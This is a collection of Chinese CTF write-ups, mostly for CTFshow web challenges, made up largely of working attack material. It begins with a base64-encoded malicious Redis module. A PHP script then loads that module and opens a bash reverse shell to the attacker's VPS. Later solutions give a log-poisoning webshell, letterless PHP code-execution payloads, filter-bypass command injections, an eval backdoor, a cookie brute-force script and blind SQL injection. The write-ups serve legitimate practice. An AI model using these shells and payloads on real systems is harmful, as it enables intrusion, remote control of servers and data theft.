1ZUxlbmd0aABmZ2V0c0BAR0xJQkNfMi4yLjUAZXhlY3ZlQEBHTElCQ18yLjIuNQBSZWRpc01vZHVsZV9HZXRDb250ZXh0RmxhZ3MAaW5ldF9hZGRyQEBHTElCQ18yLjIuNQBSZWRpc01vZHVsZV9BbGxvYwBSZWRpc01vZHVsZV9EaWN0RGVsQwBSZWRpc01vZHVsZV9HZXRTZWxlY3RlZERiAFJlZGlzTW9kdWxlX1dyb25nQXJpdHkAUmVkaXNNb2R1bGVfQ2FsbFJlcGx5QXJyYXlFbGVtZW50AFJlZGlzTW9kdWxlX0RpY3RJdGVyYXRvclJlc2Vla0MAUmVkaXNNb2R1bGVfU3RyaW5nU2V0AFJlZGlzTW9kdWxlX1JlcGx5V2l0aERvdWJsZQBSZWRpc01vZHVsZV9GcmVlRGljdABSZWRpc01vZHVsZV9HZXRFeHBpcmUAUmVkaXNNb2R1bGVfRGlnZXN0QWRkU3RyaW5nQnVmZmVyAFJlZGlzTW9kdWxlX1pzZXRGaXJzdEluTGV4UmFuZ2UAbWFsbG9jQEBHTElCQ18yLjIuNQBSZWRpc01vZHVsZV9HZXRDbGllbnRJZABSZWRpc01vZHVsZV9MaXN0UG9wAFJldlNoZWxsQ29tbWFuZABfZW5kAFJlZGlzTW9kdWxlX1N0cmluZ1RydW5jYXRlAFJlZGlzTW9kdWxlX0xvZ0lPRXJyb3IAUmVkaXNNb2R1bGVfRGlnZXN0RW5kU2VxdWVuY2UAUmVkaXNNb2R1bGVfUmVwbHlXaXRoU3RyaW5nAFJlZGlzTW9kdWxlX0RpY3RDb21wYXJlAHJlYWxsb2NAQEdMSUJDXzIuMi41AF9fYnNzX3N0YXJ0AFJlZGlzTW9kdWxlX1JldGFpblN0cmluZwBSZWRpc01vZHVsZV9TdHJpbmdBcHBlbmRCdWZmZXIAUmVkaXNNb2R1bGVfQ3JlYXRlU3RyaW5nRnJvbUxvbmdMb25nAFJlZGlzTW9kdWxlX1pzZXRGaXJzdEluU2NvcmVSYW5nZQBSZWRpc01vZHVsZV9Mb2cAUmVkaXNNb2R1bGVfR2V0QXBpAFJlZGlzTW9kdWxlX0NyZWF0ZVN0cmluZ1ByaW50ZgBSZWRpc01vZHVsZV9EaWN0UmVwbGFjZQBSZWRpc01vZHVsZV9SZXBseVdpdGhFcnJvcgBwb3BlbkBAR0xJQkNfMi4yLjUAUmVkaXNNb2R1bGVfRGljdEl0ZXJhdG9yU3RhcnQAUmVkaXNNb2R1bGVfVW5saW5rS2V5AFJlZGlzTW9kdWxlX01vZHVsZVR5cGVHZXRWYWx1ZQBSZWRpc01vZHVsZV9EaWN0Q29tcGFyZUMAUmVkaXNNb2R1bGVfS2V5QXRQb3MAUmVkaXNNb2R1bGVfQXV0b01lbW9yeQBSZWRpc01vZHVsZV9EaWN0RGVsAFJlZGlzTW9kdWxlX0RlbGV0ZUtleQBSZWRpc01vZHVsZV9DcmVhdGVDb21tYW5kAGF0b2lAQEdMSUJDXzIuMi41AFJlZGlzTW9kdWxlX1pzZXRSYW5nZUVuZFJlYWNoZWQAUmVkaXNNb2R1bGVfRGljdFJlcGxhY2VDAFJlZGlzTW9kdWxlX0NhbGxSZXBseUludGVnZXIAc3RyY2F0QEBHTElCQ18yLjIuNQBSZWRpc01vZHVsZV9TYXZlU3RyaW5nAFJlZGlzTW9kdWxlX1pzZXRBZGQAUmVkaXNNb2R1bGVfRGljdE5leHRDAFJlZGlzTW9kdWxlX1NldEV4cGlyZQBSZWRpc01vZHVsZV9ac2V0UmFuZ2VQcmV2AFJlZGlzTW9kdWxlX0ZyZWVDYWxsUmVwbHkAUmVkaXNNb2R1bGVfRGljdEl0ZXJhdG9yUmVzZWVrAFJlZGlzTW9kdWxlX01vZHVsZVR5cGVHZXRUeXBlAGNvbm5lY3RAQEdMSUJDXzIuMi41AFJlZGlzTW9kdWxlX0Nsb3NlS2V5AFJlZGlzTW9kdWxlX0RpY3RHZXRDAFJlZGlzTW9kdWxlX1pzZXRSYW5nZUN1cnJlbnRFbGVtZW50AFJlZGlzTW9kdWxlX1JlcGx5V2l0aEFycmF5AFJlZGlzTW9kdWxlX0RpY3RQcmV2QwBSZWRpc01vZHVsZV9EaWN0U2l6ZQBSZWRpc01vZHVsZV9Mb2FkVW5zaWduZWQAUmVkaXNNb2R1bGVfRGljdE5leHQAUmVkaXNNb2R1bGVfUmVwbHlXaXRoQ2FsbFJlcGx5AFJlZGlzTW9kdWxlX1NhdmVTaWduZWQAUmVkaXNNb2R1bGVfTG9hZEZsb2F0AFJlZGlzTW9kdWxlX0NhbGxSZXBseUxlbmd0aABSZWRpc01vZHVsZV9GcmVlU3RyaW5nAFJlZGlzTW9kdWxlX1pzZXRTY29yZQBSZWRpc01vZHVsZV9ac2V0UmFuZ2VOZXh0AFJlZGlzTW9kdWxlX0NyZWF0ZVN0cmluZwBSZWRpc01vZHVsZV9TdHJpbmdQdHJMZW4AUmVkaXNNb2R1bGVfWnNldExhc3RJblNjb3JlUmFuZ2UAc29ja2V0QEBHTElCQ18yLjIuNQBSZWRpc01vZHVsZV9SZXBseVdpdGhOdWxsAFJlZGlzTW9kdWxlX0NhbGwAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbGEucGx0AC50ZXh0AC5yb2RhdGEALmVoX2ZyYW1lAC5keW5hbWljAC5nb3QucGx0AC5ic3MALmNvbW1lbnQALmRlYnVnX2FyYW5nZXMALmRlYnVnX2luZm8ALmRlYnVnX2FiYnJldgAuZGVidWdfbGluZQAuZGVidWdfc3RyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAfAAAABQAAAAIAAAAAAAAAWAEAAAAAAABYAQAAAAAAAFwEAAAAAAAAAwAAAAAAAAAIAAAAAAAAAAQAAAAAAAAAGwAAAPb%2F%2F28CAAAAAAAAALgFAAAAAAAAuAUAAAAAAAAcBAAAAAAAAAMAAAAAAAAACAAAAAAAAAAAAAAAAAAAACUAAAALAAAAAgAAAAAAAADYCQAAAAAAANgJAAAAAAAAsA0AAAAAAAAEAAAAAQAAAAgAAAAAAAAAGAAAAAAAAAAtAAAAAwAAAAIAAAAAAAAAiBcAAAAAAACIFwAAAAAAADMNAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAANQAAAP%2F%2F%2F28CAAAAAAAAALwkAAAAAAAAvCQAAAAAAAAkAQAAAAAAAAMAAAAAAAAAAgAAAAAAAAACAAAAAAAAAEIAAAD%2B%2F%2F9vAgAAAAAAAADgJQAAAAAAAOAlAAAAAAAAMAAAAAAAAAAEAAAAAQAAAAgAAAAAAAAAAAAAAAAAAABRAAAABAAAAEIAAAAAAAAAECYAAAAAAAAQJgAAAAAAAGgBAAAAAAAAAwAAAA0AAAAIAAAAAAAAABgAAAAAAAAAVgAAAAEAAAAGAAAAAAAAAIAnAAAAAAAAgCcAAAAAAAAAAQAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAAFsAAAABAAAABgAAAAAAAACAKAAAAAAAAIAoAAAAAAAAEhIAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAABhAAAAAQAAAAIAAAAAAAAAmDoAAAAAAACYOgAAAAAAAL8MAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAaQAAAAEAAAACAAAAAAAAAFhHAAAAAAAAWEcAAAAAAADEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAHMAAAAGAAAAAwAAAAAAAACgTiAAAAAAAKBOAAAAAAAAYAEAAAAAAAAEAAAAAAAAAAgAAAAAAAAAEAAAAAAAAAB8AAAAAQAAAAMAAAAAAAAAAFAgAAAAAAAAUAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAhQAAAAgAAAADAAAAAAAAAJBQIAAAAAAAkFAAAAAAAADgAwAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAIoAAAABAAAAMAAAAAAAAAAAAAAAAAAAAJBQAAAAAAAAKwAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAACTAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAC7UAAAAAAAADAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAogAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA61AAAAAAAAD1HgAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAK4AAAABAAAAAAAAAAAAAAAAAAAAAAAAAOBvAAAAAAAAPwIAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAC8AAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAfcgAAAAAAABkDAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAyAAAAAEAAAAwAAAAAAAAAAAAAAAAAAAAOHUAAAAAAAD7EgAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAADiIAAAAAAAACBAAAAAAAAAWAAAAGgAAAAgAAAAAAAAAGAAAAAAAAAAJAAAAAwAAAAAAAAAAAAAAAAAAAAAAAABAmAAAAAAAAAoOAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAASqYAAAAAAADTAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA%3D%3D
可以检验下是否上传成功
接下来利用php的redis拓展写个php脚本来加载恶意so文件反弹shell
<?php
$redis = new Redis();
$redis->connect('127.0.0.1',8888);
$redis->auth('ye_w4nt_a_gir1fri3nd');
$redis->rawCommand('module','load','/var/www/html/shell.so');
$redis->rawCommand("system.exec","bash -c 'exec bash -i &>/dev/tcp/your VPSIP/port <&1'");
需要将其先base64后再进行url编码,避免特殊字符如=或+的影响
同样先上传
?exp=file_put_contents('shell.php',base64_decode($_POST['shell']));
然后访问shell.php加载so文件,反弹shell成功
接下来提权和上面一样
GameV4.0
在data.js里,base64解码即可
CTFshow36D杯
RemoteImageDownloader
可以访问下载外网文件
POC
<html>
<head>
<body>
<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///flag");
x.send();
</script>
</body>
</head>
</html>
在自己服务器上创建此html,然后在题目中去访问即可下载flag图片
ALL_INFO_U_WANT
进入题目是一个魔方游戏
扫描发现备份文件index.php.bak
visit all_info_u_want.php and you will get all information you want
= =Thinking that it may be difficult, i decided to show you the source code:
<?php
error_reporting(0);
//give you all information you want
if (isset($_GET['all_info_i_want'])) {
phpinfo();
}
if (isset($_GET['file'])) {
$file = "/var/www/html/" . $_GET['file'];
//really baby include
include($file);
}
?>
really really really baby challenge right?
存在get参数all_info_i_want就会回显phpinfo,同时会包含传入的file参数
nginx日志默认路径是/var/log/nginx/access.log
往User-Agent写入一句话木马
然后蚁剑连接,跟目录下发现flag文件
说明flag在/etc中
grep -r "ctfshow" /etc
你取吧
直接给源码
<?php
error_reporting(0);
show_source(__FILE__);
$hint=file_get_contents('php://filter/read=convert.base64-encode/resource=hhh.php');
$code=$_REQUEST['code'];
$_=array('a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z','\~','\^');
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
if (preg_match ('/' . $blacklisted . '/im', $code)) {
die('nonono');
}
}
eval("echo($code);");
?>
过滤了所有字母,和~,^,说明取反异或都不行了
解法一(利用数组下标进行取值)
因为$和[]都没被过滤,所以可以利用数组下标来取值绕过
如:system == $_[18].$_[24].$_[18].$_[19].$_[4].$_[11]
而在php中反引号可以用来执行命令
所以直接构造ls / => $_[13]$_[18] / ,然后再用``来执行
然后构造cat /flag即可
?code=`$_[2]$_[0]$_[19] /$_[5]$_[13]$_[0]$_[6]`
解法二(无字母RCE)
需要用1),(1来闭合echo
/GET
?code=1);$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);(1
/POST
_=system('cat /flag');
记得要url编码一下,不然+就没了
解法三(预期解)
读取源码中的$hint,还是利用数组下标
?code=${$_{7}.$_{8}.$_{12}.$_{19}}
base64下得到一个压缩包和一个hint.php
<?php
$a="/phpjiami.zip\n/hint.php";
?
解压压缩包发现一个混淆文件
网上找的解密脚本
<?php
function decrypt($data, $key)
{
$data_1 = '';
for ($i = 0; $i < strlen($data); $i++) {
$ch = ord($data[$i]);
if ($ch < 245) {
if ($ch > 136) {
$data_1 .= chr($ch / 2);
} else {
$data_1 .= $data[$i];
}
}
}
$data_1 = base64_decode($data_1);
$key = md5($key);
$j = $ctrmax = 32;
$data_2 = '';
for ($i = 0; $i < strlen($data_1); $i++) {
if ($j <= 0) {
$j = $ctrmax;
}
$j--;
$data_2 .= $data_1[$i] ^ $key[$j];
}
return $data_2;
}
function find_data($code)
{
$code_end = strrpos($code, '?>');
if (!$code_end) {
return "";
}
$data_start = $code_end + 2;
$data = substr($code, $data_start, -46);
return $data;
}
function find_key($code)
{
// $v1 = $v2('bWQ1');
// $key1 = $v1('??????');
$pos1 = strpos($code, "('" . preg_quote(base64_encode('md5')) . "');");
$pos2 = strrpos(substr($code, 0, $pos1), '$');
$pos3 = strrpos(substr($code, 0, $pos2), '$');
$var_name = substr($code, $pos3, $pos2 - $pos3 - 1);
$pos4 = strpos($code, $var_name, $pos1);
$pos5 = strpos($code, "('", $pos4);
$pos6 = strpos($code, "')", $pos4);
$key = substr($code, $pos5 + 2, $pos6 - $pos5 - 2);
return $key;
}
$input_file = $argv[1];
$output_file = $argv[1] . '.decrypted.php';
$code = file_get_contents($input_file);
$data = find_data($code);
if (!$code) {
echo '未找到加密数据', PHP_EOL;
exit;
}
$key = find_key($code);
if (!$key) {
echo '未找到秘钥', PHP_EOL;
exit;
}
$decrypted = decrypt($data, $key);
$uncompressed = gzuncompress($decrypted);
// 由于可以不勾选代码压缩的选项,所以这里判断一下是否解压成功,解压失败就是没压缩
if ($uncompressed) {
$decrypted = str_rot13($uncompressed);
} else {
$decrypted = str_rot13($decrypted);
}
file_put_contents($output_file, $decrypted);
echo '解密后文件已写入到 ', $output_file, PHP_EOL;
?>
直接在cmd中运行即可
其中3.php为解密脚本,1.php为待解密文件
1.php.decrypted.php即hint.php
?><?php @eval("//Encode by phpjiami.com,Free user."); ?><?php
$ch = explode(".","hello.ass.world.er.rt.e.saucerman");
$c = $ch[1].$ch[5].$ch[4];
@$c($_POST[7-1]);
?>
<?php
发现有马,直接用即可
WUSTCTF_朴实无华_Revenge
给了源码,一看就是一个代码审计题
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
function isPalindrome($str){
$len=strlen($str);
$l=1;
$k=intval($len/2)+1;
for($j=0;$j<$k;$j++)
if (substr($str,$j,1)!=substr($str,$len-$j-1,1)) {
$l=0;
break;
}
if ($l==1) return true;
else return false;
}
//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
$numPositve = intval($num);
$numReverse = intval(strrev($num));
if (preg_match('/[^0-9.-]/', $num)) {
die("非洲欢迎你1");
}
if ($numPositve <= -999999999999999999 || $numPositve >= 999999999999999999) { //在64位系统中 intval()的上限不是2147483647 省省吧
die("非洲欢迎你2");
}
if( $numPositve === $numReverse && !isPalindrome($num) ){
echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
}else{
die("金钱解决不了穷人的本质问题");
}
}else{
die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5(md5($md5)))
echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
else
die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}
//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("more", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("tail", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("less", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("head", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("tac", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("$", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("sort", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("curl", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("nc", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("bash", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("php", "36dCTFShow", $get_flag);
echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
system($get_flag);
}else{
die("快到非洲了");
}
}else{
die("去非洲吧");
}
?>
去非洲吧
level1
function isPalindrome($str){
$len=strlen($str);
$l=1;
$k=intval($len/2)+1;
for($j=0;$j<$k;$j++)
if (substr($str,$j,1)!=substr($str,$len-$j-1,1)) {
$l=0;
break;
}
if ($l==1) return true;
else return false;
}
//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
$numPositve = intval($num); //intval返回int值
$numReverse = intval(strrev($num)); //strrev返回字符串
if (preg_match('/[^0-9.-]/', $num)) {
die("非洲欢迎你1");
}
if ($numPositve <= -999999999999999999 || $numPositve >= 999999999999999999) { //在64位系统中 intval()的上限不是2147483647 省省吧
die("非洲欢迎你2");
}
if( $numPositve === $numReverse && !isPalindrome($num) ){
echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
}else{
die("金钱解决不了穷人的本质问题");
}
}else{
die("去非洲吧");
}
payload
?num=0.001.0
level2
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5(md5($md5)))
echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
else
die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}
要求传入参数等于2次md5后的参数的值
因为是两个等于,所以直接php弱类型绕过即可,脚本跑出0e开头的md5即可
import hashlib
def md5(s):
return hashlib.md5(s.encode()).hexdigest()
for i in range(10**30):
i='0e'+str(i)
result=md5(md5(i))
if result[0:2]=='0e' and result[2:].isnumeric():
print(i)
结果为0e1138100474
level3
//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("more", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("tail", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("less", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("head", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("tac", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("$", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("sort", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("curl", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("nc", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("bash", "36dCTFShow", $get_flag);
$get_flag = str_ireplace("php", "36dCTFShow", $get_flag);
echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
system($get_flag);
}else{
die("快到非洲了");
}
}else{
die("去非洲吧");
}
过滤了空格和一些关键字
空格可以用<来代替,还有很多绕过空格的方法这里就不说了,关键字可以用\来分割绕过
payload
?num=0.001.0&md5=0e1138100474&get_flag=ca\t</flag
WEB_WUSTCTF朴实无华Revenge_Revenge
前面基本差不多,就最后的目录换了下
payload
?num=0.00&md5=0e1138100474&get_flag=ca\t<\flag.p\hp
给你shell
查看网页源代码得到源码
<?php
//It's no need to use scanner. Of course if you want, but u will find nothing.
error_reporting(0);
include "config.php";
if (isset($_GET['view_source'])) {
show_source(__FILE__);
die;
}
function checkCookie($s) {
$arr = explode(':', $s);
if ($arr[0] === '{"secret"' && preg_match('/^[\"0-9A-Z]*}$/', $arr[1]) && count($arr) === 2 ) {
return true;
} else {
if ( !theFirstTimeSetCookie() ) setcookie('secret', '', time()-1);
return false;
}
}
function haveFun($_f_g) {
$_g_r = 32;
$_m_u = md5($_f_g);
$_h_p = strtoupper($_m_u);
for ($i = 0; $i < $_g_r; $i++) {
$_i = substr($_h_p, $i, 1);
$_i = ord($_i);
print_r($_i & 0xC0);
}
die;
}
isset($_COOKIE['secret']) ? $json = $_COOKIE['secret'] : setcookie('secret', '{"secret":"' . strtoupper(md5('y1ng')) . '"}', time()+7200 );
checkCookie($json) ? $obj = @json_decode($json, true) : die('no');
if ($obj && isset($_GET['give_me_shell'])) {
($obj['secret'] != $flag_md5 ) ? haveFun($flag) : echo "here is your webshell: $shell_path";
}
die;
目标很清晰,就是要cookie中的secret等于$flag的md5值,不等于则会打印出$flag的逐位与0xC0与的结果
get传入give_me_shell,得到了 $flag的逐位与0xC0与的结果
需要注意$_i & 0xC0其中&代表是全真即为真,有一个假即为假
所以前三位均为0说明$flag的md5的前三位为数字,而第四位开始为64,说明第四位为字母,
因为这里用的是弱等于,所以直接爆破前三位的数字即可
poc
import requests
url="http://a628508f-479e-48e5-892f-80b3f333641a.challenge.ctf.show/index.php?give_me_shell"
for i in range(1,1000):
headers = {
'cookie': 'secret={"secret": ' + str(i) + '}'
}
res = requests.post(url, headers=headers)
if "0006464640064064646464006406464064640064006400000000000" not in res.text:
print(headers['cookie'])
break
跑出来secret为115,所以修改cookie中的secret为{"secret": 115}即可
获得了一个w3b5HeLLlll123.php和flag在flag.txt里的提示
w3b5HeLLlll123.php
<?php
error_reporting(0);
session_start();
//there are some secret waf that you will never know, fuzz me if you can
require "hidden_filter.php";
if (!$_SESSION['login'])
die('<script>location.href=\'./index.php\'</script>');
if (!isset($_GET['code'])) {
show_source(__FILE__);
exit();
} else {
$code = $_GET['code'];
if (!preg_match($secret_waf, $code)) {
//清空session 从头再来
eval("\$_SESSION[" . $code . "]=false;"); //you know, here is your webshell, an eval() without any disabled_function. However, eval() for $_SESSION only XDDD you noob hacker
} else die('hacker');
}
fuzz一下,过滤了很多东西,$;^f/*&),`"'都没了
可以利用require和~取反
读flag.txt
?code=]=123?><?=require~%d0%99%93%9e%98%d1%8b%87%8b?>
读flag
?code=]=123?><?=require~%d0%99%93%9e%98?>
Login_Only_For_36D
用户名有admin即可进行注入,源码中发现
过滤了引号,但是还有注释符可用,可以用\将单引号转义,if可用,但过滤了substr和ascii,mid,可用right,left,ord来代替
payload
"username":"admin\\"
"password":"or(if(ord(right(password,6))like('0'),sleep(3),1))#"
写个脚本时间盲注出密码即可
